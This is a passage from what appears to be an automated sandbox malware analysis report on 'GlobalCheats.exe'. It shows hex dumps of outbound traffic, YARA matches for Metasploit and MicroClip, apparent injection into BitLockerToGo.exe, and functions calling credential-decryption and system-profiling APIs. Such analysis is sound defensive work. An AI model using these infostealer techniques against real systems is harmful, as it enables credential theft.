6d 7c b6 71 c1 d5 80 75 97 ee 7a e3 a6 Data Ascii: k4,*.eOhQr`E@OfS+sB]c?~S}m^q}IixaN^Ba@^d45B>gzL[h6a<#Q&p,Y(p!6]\@Ct<LzpF@GNMMbaUim\|quz
2024-06-18 20:59:47 UTC	15331	OUT	Data Raw: 1b c8 79 55 52 f6 b9 7f 9a 28 07 51 96 c2 a4 9e 71 d0 ff 8b 0a 97 e9 cb f3 5e da f6 34 c2 3c 5f 46 be 76 01 4c 25 cc 09 79 35 bf c7 8c 65 24 9a da 13 ff 8d 44 a0 a9 a1 62 7b a4 b1 f3 28 4f b4 79 3b ca dc 49 e3 d7 65 fc 4b bf ad f7 20 ba e3 5c 00 ab 0f 41 62 19 01 4c df 74 ba cd 9a 99 dd 79 72 f5 04 e7 9a 01 1e 3f a5 1b fc 55 32 10 cb 83 11 c6 f4 2a 8c a3 19 51 45 dd 46 73 b2 1f ac 19 4d c6 d8 70 a1 46 79 2b f7 4c a7 a4 d1 91 f1 3b 33 43 15 f1 9b 2f 05 28 fc 9c 3b a3 c1 d8 7a 52 ed 75 26 33 e2 ef 41 72 9d 44 a4 71 1d 82 1d 08 93 28 47 5d 22 d2 fa d0 8c b8 72 f5 74 f8 1e df d2 53 3e 15 c9 64 4b fb 8c 04 9c 90 e0 7e 46 c9 9e 5d 3a 5c d2 77 59 d3 1b cf 24 22 0f f3 99 54 fd 58 69 d2 ba b9 9a d9 ba c5 1d d6 a4 83 11 02 af 07 d4 c6 b3 de 70 81 3f 5f c7 9e 44 d6 Data Ascii: yUR(Qq^4<_FvL%y5e$Db{(Oy;IeK \AbLtyr?U2*QEFsMpFy+L;3C/(;zRu&3ArDq(G]"rtS>dK~F]:\wY$"TXip?_D
2024-06-18 20:59:47 UTC	15331	OUT	Data Raw: c6 ec aa fe fb 7e 37 86 94 a4 66 2a c7 fd 48 d4 0d 26 c5 91 be 3d 8c 7a 7e 58 56 14 38 36 c9 0d 45 ea 7c fd b6 64 99 5e d1 d1 14 cf b9 22 2c fe e3 6f 6e 87 2b f6 0e 1c e4 0f 9d c0 84 fa a3 7e 2c e0 62 b3 ea 4c 68 e6 61 13 21 12 9c f9 27 81 95 5e ac 04 95 6b e3 60 d9 37 bd a2 30 7b b7 0c 6c 88 81 5f 72 b1 eb a3 44 07 db 5e 9d 25 56 d7 77 4b d8 5e 78 e1 c5 d3 ff 1d a6 b9 9e 81 bd c3 25 2d 42 7f 85 d8 89 aa 32 91 54 d8 66 ac 56 94 65 b7 ae 56 fb 0c 65 a8 fb 61 de eb 83 fb b3 cf 5c 40 df 5c 63 9c d9 99 29 72 15 ba 49 55 d7 5c 46 cf a2 97 73 66 6c 8e 92 e9 ac 25 55 da 18 00 6f d1 8c 79 56 1f 29 4d 04 10 f6 88 45 29 71 b3 1b b6 d7 06 ff 5d 97 1c a9 61 76 4e fd 4c 90 3b ee 0c ef 03 0d 2a 3b fb 1d 66 5b 20 0c 38 24 c5 90 6f 80 a9 61 97 b8 c0 03 71 86 1e 22 ed ee Data Ascii: ~7fH&=z~XV86E\|d^",on+~,bLha!'^k`70{l_rD^%VwK^x%-B2TfVeVea\@\c)rIU\Fsfl%UoyV)ME)q]avNL;;f[ 8$oaq"
2024-06-18 20:59:47 UTC	15331	OUT	Data Raw: 86 6d fe df b5 63 ff 73 d4 ea f4 f6 f9 6f 37 aa 49 e9 ca 8a 7f da 45 1c 01 86 4d e1 10 76 14 17 35 39 e2 a3 f5 fc e3 58 bc cb 9d c0 6f 47 1e 2d 6d 65 7a 19 ef 13 d9 f0 72 14 50 a8 ee 79 e9 8d 29 1a be 8c c3 23 be ff 4e c7 8e 15 2f 98 93 f8 bf 6e b6 23 ea 80 b4 53 95 d1 cd 6c f3 54 df 27 0e ae fc 93 ba 23 d6 99 07 51 24 08 13 4a 7b ec 91 63 f3 b5 10 98 7d 16 0a 11 e5 b2 94 21 47 e1 de 93 1c ad 73 69 dc 7b 3d e8 98 3e bc cb 45 62 20 ef fd 48 8b b6 4d cd 5a d1 2c 0f b9 92 35 cd cc 11 ea 14 0d 77 91 2c 8e a8 3e 02 2c 46 33 35 50 df b1 bd 7f 69 c3 15 0d 57 71 90 5a 03 36 f6 6a 64 39 64 ed 68 2f 01 78 6a 9c 20 e2 50 08 9e 55 ec 9c 9d 25 32 c9 3a 3c f8 fd 0a a5 72 d7 6d 25 e6 c8 04 cb 52 2c 0b 1b f6 f3 57 ab ff ef 02 5f e6 61 66 49 f1 31 e1 85 cb 31 99 3a 18 e3 Data Ascii: mcso7IEMv59XoG-mezrPy)#N/n#SlT'#Q$J{c}!Gsi{=>Eb HMZ,5w,>,F35PiWqZ6jd9dh/xj PU%2:<rm%R,W_afI11:
2024-06-18 20:59:47 UTC	15331	OUT	Data Raw: ae e8 6d 7d b2 55 fb e6 97 05 21 25 41 c6 8a 6d c4 a3 83 c3 f9 8b 06 36 bd d9 c5 1d ed e8 b6 3f 86 82 41 e0 11 94 e1 b0 b7 f4 52 b1 5c ca 88 cb a9 4d 69 84 e7 b2 73 a6 71 13 fa 14 22 34 12 eb 85 54 a7 ae 66 a7 ee 7a 83 01 2e e7 d7 e5 58 f1 ce 78 f9 e0 ef be b0 36 be 38 e9 9b ef 50 fe b5 a9 0c 96 de 8e bd 2c 22 a3 09 dd 24 ab 88 60 2a f6 1a 24 6c 54 71 08 f7 72 4c f7 f7 8f 44 51 14 46 6f ad 92 2b 8f 73 f4 ea ab b9 29 ff 80 1e 45 48 c3 e8 98 d6 4a f5 b2 87 b5 25 4e 4c 64 58 7d 4a 08 e7 f6 f1 27 17 58 95 0e 4e 1d c9 3d 12 9a 7c e4 e4 f9 7f a7 cd 58 a4 75 d1 1d 76 44 c9 37 b6 d8 b6 59 b9 a8 95 9e d3 50 46 b6 4f e2 ce 8b 4b d3 86 a3 9f ec a0 cf 3c 4f e0 b3 58 30 2f dc 97 7e 0e 68 2d 1c 20 96 20 10 47 79 37 65 fb af a4 0d 60 01 39 1c 3a c7 07 ca ad dc 7f 79 bb Data Ascii: m}U!%Am6?AR\Misq"4Tfz.Xx68P,"$`*$lTqrLDQFo+s)EHJ%NLdX}J'XN=\|XuvD7YPFOK<OX0/~h- Gy7e`9:y
2024-06-18 20:59:47 UTC	15331	OUT	Data Raw: 38 b2 49 6c ff ff 7f 62 c2 19 c0 69 3b fa 01 59 dc 39 d4 2e 43 54 87 7e e4 8f 77 be 5b 97 b5 e5 27 aa cd 09 9a 02 40 02 2b 95 ea 9e a7 46 58 d0 d3 33 42 1f bd db a0 3f 74 62 c0 37 fd 49 6b f7 e7 87 f9 66 82 bc 5b f3 f6 9f 8c a8 ff bb 25 26 08 42 7c 16 17 d1 40 1b 7f 05 07 de a2 0b 05 50 c3 64 b2 e4 3f c1 69 da 3e 89 9b c7 6a 2c 8d f9 7d 75 10 0c 18 70 82 9c 23 4b ed 45 d1 03 1c 0a 95 86 b9 92 87 fb a5 46 5c e3 b1 23 aa 74 01 8c 36 cb 33 9a 1a 0c f0 eb 8f 59 63 2b 80 4f c5 7c f0 b8 c8 9b ad b8 7d d3 56 68 5e 3b 1f 3e 33 67 aa e6 c4 a9 cd 67 15 a9 c6 bc 82 63 e2 f7 20 d8 a8 5b 7f fd 8a 83 04 ea 7a c2 04 04 6e 10 70 0d b8 7a e5 a8 90 dd 54 7e 00 e1 a0 15 e2 de d0 9d 5c bb d6 9c 59 b2 8b 8d a9 d3 08 f6 b2 25 de 03 f3 1a 9d 44 48 3a 58 63 8c 4e da 44 14 e0 b6 Data Ascii: 8Ilbi;Y9.CT~w['@+FX3B?tb7Ikf[%&B\|@Pd?i>j,}up#KEF\#t63Yc+O\|}Vh^;>3ggc [znpzT~\Y%DH:XcND
2024-06-18 20:59:47 UTC	15331	OUT	Data Raw: 4a b2 08 69 d7 fa 4d 23 ed 35 07 f5 4c be 48 e7 91 93 11 f4 97 37 25 27 4c 2d 3f 45 f3 6f f0 f9 10 d0 b5 d7 d1 84 33 fc d7 24 05 1d e7 f5 69 02 5f ed ff ef a5 37 d6 71 7a 27 33 21 3e 26 b1 6c a7 21 2f f3 ae 9a 97 20 e2 8d 59 f4 58 63 22 60 d8 1d 05 f9 87 67 54 a0 fc 5f 66 4c 77 87 e1 8b 57 bf 88 56 ee bc 59 cc d6 40 40 e4 17 d7 d4 d3 de ac ab f9 e1 8c 84 fc a5 9a 09 97 29 78 a2 b6 89 54 81 56 17 b0 6c dd 11 7a 14 86 61 6a 50 8c 5a a1 29 ce db fd fa 72 91 4a ca 04 80 9d 1c bd e3 fc 8d 21 df d9 81 9e 1e d2 07 5c e7 0f 8c d6 84 f7 dc 16 70 0c 5a 78 35 6f af 42 6c a1 67 79 0c 56 ca 0d 96 dc 75 c9 17 5b 18 08 93 8a f4 6e 56 ee 18 5b 2a d6 a6 47 51 eb 66 3d f2 42 10 ee 05 8c fd b9 3e f6 8a 30 08 f1 9e 9b 95 87 c3 fc a0 d7 9a 49 13 1f f6 a4 c0 a2 8e 9f a8 92 ac Data Ascii: JiM#5LH7%'L-?Eo3$i_7qz'3!>&l!/ YXc"`gT_fLwWVY@@)xTVlzajPZ)rJ!\pZx5oBlgyVu[nV[*GQf=B>0I
2024-06-18 20:59:49 UTC	806	IN	HTTP/1.1 200 OK Date: Tue, 18 Jun 2024 20:59:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=fcs478hg3dcvbk0gdktunu69mn; expires=Sat, 12-Oct-2024 14:46:27 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ei3xoXpv9bQCtpjorWDyfK33WMYKnwM4bnhcu%2FqXudZPEL%2F15DM3z59SbnJ2wtVizltAe3YWw56YESkBRp2y1up08i708nPWaJUcywYbmA5JMTFIyocwlpBIDYVPoaP4RsrivwPOzA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 895e34838eb443ee-EWR alt-svc: h3=":443"; ma=86400

Target ID:	0
Start time:	16:59:17
Start date:	18/06/2024
Path:	C:\Users\user\Desktop\GlobalCheats.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\GlobalCheats.exe"
Imagebase:	0x7ff759160000
File size:	87'635'968 bytes
MD5 hash:	0786D76CBBF390B342C5B65F14A23530
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Go lang
Yara matches:	Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000000.00000002.1971278042.000000C000FEC000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_MicroClip, Description: Yara detected MicroClip, Source: 00000000.00000000.1776340156.00007FF75C5ED000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	16:59:36
Start date:	18/06/2024
Path:	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Imagebase:	0x940000
File size:	231'736 bytes
MD5 hash:	A64BEAB5D4516BECA4C40B25DC0C1CD8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	14.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	50.2%
Total number of Nodes:	255
Total number of Limit Nodes:	15

Executed Functions

Function 032DD360 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 207
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserCallbackDispatcher.NTDLL ref: 032DD3FC
GetSystemMetrics.USER32 ref: 032DD40D
DeleteObject.GDI32 ref: 032DD475
SelectObject.GDI32 ref: 032DD4CF
SelectObject.GDI32 ref: 032DD55D
DeleteObject.GDI32 ref: 032DD59A

Strings

, xrefs: 032DD52A

Memory Dump Source

Source File: 00000004.00000002.2076277895.00000000032B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_32b0000_BitLockerToGo.jbxd

Similarity

API ID: Object$DeleteSelect$CallbackDispatcherMetricsSystemUser
String ID:
API String ID: 1449868515-3916222277
Opcode ID: e2051b0904eca5acc6fe3d076a004373089a4cf14f4afb76ed1e6ea247dcc556
Instruction ID: d65365d3edc6653899c3e1ba8d5e5637af5c82293b0a5cccdecf071efd76cf28
Opcode Fuzzy Hash: e2051b0904eca5acc6fe3d076a004373089a4cf14f4afb76ed1e6ea247dcc556
Instruction Fuzzy Hash: 89915BB4605B008FD364EF2CE585A16BBF1FB49700B108A6DE99ACB764D731F845CB92

Function 032B9EC0 Relevance: 11.7, Strings: 9, Instructions: 451
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

0, xrefs: 032B9F36
P]%y, xrefs: 032BA2E5
S\S`, xrefs: 032BA17F
9t, xrefs: 032BA3A0
Ih, xrefs: 032BA3A8
cTQ^, xrefs: 032BA187
`{, xrefs: 032BA398
E%, xrefs: 032BA3B0
z, xrefs: 032BA2A5

Memory Dump Source

Source File: 00000004.00000002.2076277895.00000000032B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_32b0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 0$9t$E%$Ih$P]%y$S\S`$`{$cTQ^$z
API String ID: 0-2932981496
Opcode ID: 9ada513c6cfd65a480f0ad8e4d2ef1ef92523d7c885e5e9e8c51d1d4afdbb773
Instruction ID: 252a7fc2d69ea01d225ad7fdb4305da16fc1136cc555e20d58c857885847622f
Opcode Fuzzy Hash: 9ada513c6cfd65a480f0ad8e4d2ef1ef92523d7c885e5e9e8c51d1d4afdbb773
Instruction Fuzzy Hash: 8D1244B1619341AFD324CF14C590BABBBF2EBC5788F14992DE4C98B252D774D849CB82

Function 032CF593 Relevance: 9.6, Strings: 7, Instructions: 835COMMON

Download Yara Rule

Strings

!, xrefs: 032CFDC7
aFNW, xrefs: 032CFB39
VzkD, xrefs: 032CFB41
ivhO, xrefs: 032CFB49
}, xrefs: 032CFAA0
Rn-2, xrefs: 032CFB51
}[I@, xrefs: 032CFB31

Memory Dump Source

Source File: 00000004.00000002.2076277895.00000000032B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_32b0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: !$Rn-2$VzkD$aFNW$ivhO$}[I@$}
API String ID: 0-3439536464
Opcode ID: 5b154ea7689d9887c6255b0ad4580526a23e832275f23be73bb40d00514dd61a
Instruction ID: f25bf106559ea5c74f25f28c65fc8c6b71ee4a653568706e074b019b1361f1c8
Opcode Fuzzy Hash: 5b154ea7689d9887c6255b0ad4580526a23e832275f23be73bb40d00514dd61a
Instruction Fuzzy Hash: 8D52FDB5528381DFD714CF28D49066BBBE2EF85344F58896DE4C68B342C774E885CB92

Function 032D6551 Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 404
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 032D66AC

Strings

Cvxe, xrefs: 032D659C

Memory Dump Source

Source File: 00000004.00000002.2076277895.00000000032B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_32b0000_BitLockerToGo.jbxd

Similarity

API ID: InstalledMemoryPhysicallySystem
String ID: Cvxe
API String ID: 3960555810-581392900
Opcode ID: d75b60385e6107306f538971fc9fc837b02f429fba6c5308b8d62e60e8d1297e
Instruction ID: f41f995f0d3d045735789bbbc121a3c15f731355208e58d3a466e41ec5784f97
Opcode Fuzzy Hash: d75b60385e6107306f538971fc9fc837b02f429fba6c5308b8d62e60e8d1297e
Instruction Fuzzy Hash: 1CD1BE74214B428BD729CF29C090762FBF2BF46304F588A9DC4EB8B796D734A449CB94

Function 032D6563 Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 381
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 032D66AC

Strings

Cvxe, xrefs: 032D659C

Memory Dump Source

Source File: 00000004.00000002.2076277895.00000000032B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_32b0000_BitLockerToGo.jbxd

Similarity

API ID: InstalledMemoryPhysicallySystem
String ID: Cvxe
API String ID: 3960555810-581392900
Opcode ID: a0ee30ccf0381f74292575cdb970666aa533a747d48a1c5cbf1d6cee6bbd9523
Instruction ID: 30c5070df272d6a7e0332823bfc278c4c4d931a508190d8823019841fbd60efa
Opcode Fuzzy Hash: a0ee30ccf0381f74292575cdb970666aa533a747d48a1c5cbf1d6cee6bbd9523
Instruction Fuzzy Hash: 28D1BC74114B828BD729CF29C090762FBF1BF46304F588A9DC4EB8B796D735A449CB94

Function 032D6A63 Relevance: 3.7, APIs: 2, Instructions: 688
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetComputerNameExA.KERNELBASE(00000006,?,?), ref: 032D6CC2
GetComputerNameExA.KERNELBASE(00000005,?,?), ref: 032D6DC7

Memory Dump Source

Source File: 00000004.00000002.2076277895.00000000032B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_32b0000_BitLockerToGo.jbxd

Similarity

API ID: ComputerName
String ID:
API String ID: 3545744682-0
Opcode ID: 545fdcc8a7b8b2912d9ecaa39f585436cffbac414f6e7d1336ae6a4d162347b8
Instruction ID: e3cc38171339e7804ad028ab573bb73d342d7d9ea82bf41a93f87bfcc90fd82b
Opcode Fuzzy Hash: 545fdcc8a7b8b2912d9ecaa39f585436cffbac414f6e7d1336ae6a4d162347b8
Instruction Fuzzy Hash: F9326C70514B828FD725CF29C490B62FBF1BF56304F588A9CD4EA8B786C775A489CB90

Function 032B4F10 Relevance: 2.9, Strings: 2, Instructions: 403COMMON

Download Yara Rule

Strings

), xrefs: 032B4F99
IEND, xrefs: 032B538B

Memory Dump Source

Source File: 00000004.00000002.2076277895.00000000032B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_32b0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: )$IEND
API String ID: 0-707183367
Opcode ID: a1d6a328037a2360cdceb3423d26deb74904ec6b5a3b43c93c05046d48f0ae76
Instruction ID: 621d9dd7f573a397a4dd87385f5b6fb54c23790acc4926a464a907511e706410
Opcode Fuzzy Hash: a1d6a328037a2360cdceb3423d26deb74904ec6b5a3b43c93c05046d48f0ae76
Instruction Fuzzy Hash: 1CE1E0B59183459FD710CF28C88079ABBF5BB85344F18492CF9999B381D7B4E988CBD2

Function 032CEF50 Relevance: 2.9, Strings: 2, Instructions: 387COMMON

Download Yara Rule

Strings

avub, xrefs: 032CF31D
Psm`, xrefs: 032CF366

Memory Dump Source

Source File: 00000004.00000002.2076277895.00000000032B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_32b0000_BitLockerToGo.jbxd

Similarity

API ID: InitializeThunk
String ID: Psm`$avub
API String ID: 2994545307-1111646547
Opcode ID: 4f1042b68990676462faff0cd8474dfde5cdbbc9312bcd0cd320b6948b9ba3ff
Instruction ID: 874fcc0d1aba677a280056cc63706ea01f92de9f0b4d48ec21429b591bc280d9
Opcode Fuzzy Hash: 4f1042b68990676462faff0cd8474dfde5cdbbc9312bcd0cd320b6948b9ba3ff
Instruction Fuzzy Hash: 69C12675A38381AFD714DF18C880B6AB7E2EF94754F184A2DE5818B345E3B1D880CBD2

Function 032CAA10 Relevance: 2.9, Strings: 2, Instructions: 365COMMON

Download Yara Rule

Strings

NM, xrefs: 032CAA36
gxyz, xrefs: 032CAD58

Memory Dump Source

Source File: 00000004.00000002.2076277895.00000000032B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_32b0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: NM$gxyz
API String ID: 0-3168923107
Opcode ID: f102617e4400333ca1219f35e2994c735e080ca473ee97191e1934424d71de6a
Instruction ID: fce7b189c38e8a7421416cb94a2ad5fa9ff5ede389ec24b2b6641d87b8895810
Opcode Fuzzy Hash: f102617e4400333ca1219f35e2994c735e080ca473ee97191e1934424d71de6a
Instruction Fuzzy Hash: DEA1C0B59343499BD720DF18C891B6BB3F5EF95354F08861CE8899B291E374DD80C792

Function 032C4E21 Relevance: 1.8, APIs: 1, Instructions: 283encryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 032C4F22

Memory Dump Source

Source File: 00000004.00000002.2076277895.00000000032B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_32b0000_BitLockerToGo.jbxd

Similarity

API ID: CryptDataUnprotect
String ID:
API String ID: 834300711-0
Opcode ID: 9efa4e83587a8ab5bf373ed68bfdcca2eb5c771633d0d64255a0ba7b6480f04d
Instruction ID: 09d4aa007384f88e48ad2a2cd4382f4f7e3de5a764668222d637dfedd56bab34
Opcode Fuzzy Hash: 9efa4e83587a8ab5bf373ed68bfdcca2eb5c771633d0d64255a0ba7b6480f04d
Instruction Fuzzy Hash: D5A1E2B15283818FC714CF29C891A6BB7E1EFCA304F184A5DF5A58B392D774E845CB52

Function 032CFCD0 Relevance: 1.5, Strings: 1, Instructions: 297COMMON

Download Yara Rule

Strings

!, xrefs: 032CFDC7

Memory Dump Source

Source File: 00000004.00000002.2076277895.00000000032B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_32b0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: !
API String ID: 0-2553554435
Opcode ID: 8e2429608b6808d4334093d4822ae96406ca6a528cea0d8aec8b0d3f61ed81d5
Instruction ID: 5517d9518f833cd5ec5eec70e380206ce978579ff38e37cf2aa087419d555a53
Opcode Fuzzy Hash: 8e2429608b6808d4334093d4822ae96406ca6a528cea0d8aec8b0d3f61ed81d5
Instruction Fuzzy Hash: 55A1AC75528380DFD328DF14E895B6FBBA2FBC5358F94892CE4864B391C771A851CB82

Function 032E6BC0 Relevance: 1.5, APIs: 1, Instructions: 12libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(032E977C,005C003F,00000006,00120089,?,00000018,F0F1CECF,00000000,032C451A), ref: 032E6BE6

Memory Dump Source

Source File: 00000004.00000002.2076277895.00000000032B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_32b0000_BitLockerToGo.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3af67e3b8a4cf002b2d8122619789f5e408d063de0ae60c6913db66b84c766ee
Instruction ID: 9a2a3e30e6272c7ba4599b7d5b49d8b1df743313db24dc7d28a19b0c9381744b
Opcode Fuzzy Hash: 3af67e3b8a4cf002b2d8122619789f5e408d063de0ae60c6913db66b84c766ee
Instruction Fuzzy Hash: 82D04875908216AB9A09CF44C54040EFBE6BFC4714F228C8EA88873214C3B0BD46EB82

Function 032E3482 Relevance: 1.5, Strings: 1, Instructions: 257COMMON

Download Yara Rule

Strings

?>=<, xrefs: 032E35A7

Memory Dump Source

Source File: 00000004.00000002.2076277895.00000000032B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_32b0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: ?>=<
API String ID: 0-3799960392
Opcode ID: 2a9dded08894c40762f9c663c5605d65a8a7e69da46b59e7445e37f5e795531e
Instruction ID: a331ac6b672250ba336062a5cd7681a43528e4d348643e661c422dc07dde5fa6
Opcode Fuzzy Hash: 2a9dded08894c40762f9c663c5605d65a8a7e69da46b59e7445e37f5e795531e
Instruction Fuzzy Hash: 4B81DA78614700DFD728DF29D481A27B3F2FB89305F94896CE69A8B791C770E845CB80

Function 032E5040 Relevance: 1.5, Strings: 1, Instructions: 202COMMON

Download Yara Rule

Strings

?>=<, xrefs: 032E5086

Memory Dump Source

Source File: 00000004.00000002.2076277895.00000000032B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_32b0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: ?>=<
API String ID: 0-3799960392
Opcode ID: 9fa7d3e0f404de1183e04b2e3e93806e3c4daabd6b2e03a20fbb71256da5d387
Instruction ID: 1ab8034625f4f4fb064e31672d7225f3fdebf1ecc05cd3b5e837110f22ac41b0
Opcode Fuzzy Hash: 9fa7d3e0f404de1183e04b2e3e93806e3c4daabd6b2e03a20fbb71256da5d387
Instruction Fuzzy Hash: 45511476A283429FD714DF18C891B2AF7E1FF86708FA8892CE5815B341D771D881CB92

Function 032E9A70 Relevance: 1.4, Strings: 1, Instructions: 159COMMON

Download Yara Rule

Strings

gxyz, xrefs: 032E9A74

Memory Dump Source

Source File: 00000004.00000002.2076277895.00000000032B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_32b0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: gxyz
API String ID: 0-2474275795
Opcode ID: edf16b0ac7c0d7489b3a772285843387ee6475109f3e548483e64355058cb044
Instruction ID: 8b71b665ebe3bb0fc7a02d8a9b9599bdb2847f8add128e3102cb763900edca08
Opcode Fuzzy Hash: edf16b0ac7c0d7489b3a772285843387ee6475109f3e548483e64355058cb044
Instruction Fuzzy Hash: 4651AE756183119FD314EF08C891B6EF7F2EB86714F58891DE5899B380C379E885CB82

Function 032E97A0 Relevance: 1.4, Strings: 1, Instructions: 155COMMON

Download Yara Rule

Strings

@, xrefs: 032E984D

Memory Dump Source

Source File: 00000004.00000002.2076277895.00000000032B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_32b0000_BitLockerToGo.jbxd

Similarity

API ID: InitializeThunk
String ID: @
API String ID: 2994545307-2766056989
Opcode ID: 745d52b2f4b8cbc735c83e6cda34cd27abbcedc41ac56491d9a89f30f8386b53
Instruction ID: 465c64f70fa14dd873aa9515ae873f28f45bc2d5d20c4b2df6981cf7bbadb906
Opcode Fuzzy Hash: 745d52b2f4b8cbc735c83e6cda34cd27abbcedc41ac56491d9a89f30f8386b53
Instruction Fuzzy Hash: 7A4134B55183019FC300DF18C881B6AB7F5FF86324F488A1DE4988B391E378D985CB92

Function 032D5E2A Relevance: 1.4, Strings: 1, Instructions: 152COMMON

Download Yara Rule

Strings

?>=<, xrefs: 032D5EFA

Memory Dump Source

Source File: 00000004.00000002.2076277895.00000000032B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_32b0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: ?>=<
API String ID: 0-3799960392
Opcode ID: c6b90db9f3200ec0143303857f7ae9f3fe9e711d7c7821c2ad209f343d6d50a9
Instruction ID: c70a4db302794c94b3386e8c05b988d898345f30bcd5f0971ea1400358cf540b
Opcode Fuzzy Hash: c6b90db9f3200ec0143303857f7ae9f3fe9e711d7c7821c2ad209f343d6d50a9
Instruction Fuzzy Hash: 6551AA74215B828FD325CF29C490B22BBE2BF07305F68899CD0D68B692CB75F485CB54

Function 032CE610 Relevance: .5, Instructions: 451COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2076277895.00000000032B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_32b0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 400c921fcbd5d8182c9aa5c2d0e0ffe11b068e5eac580f1305b3f0c84f3f52a8
Instruction ID: 030f89f22fb2ec4565a1c29efc8e5d8138ed9cb2c464c6a1b73e73d8b2b0ba84
Opcode Fuzzy Hash: 400c921fcbd5d8182c9aa5c2d0e0ffe11b068e5eac580f1305b3f0c84f3f52a8
Instruction Fuzzy Hash: A90298B0128381DFD324DF18E891B6BBBE2FF85344F59892CE1899B294C770E855CB52

Function 032D8D16 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2076277895.00000000032B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_32b0000_BitLockerToGo.jbxd

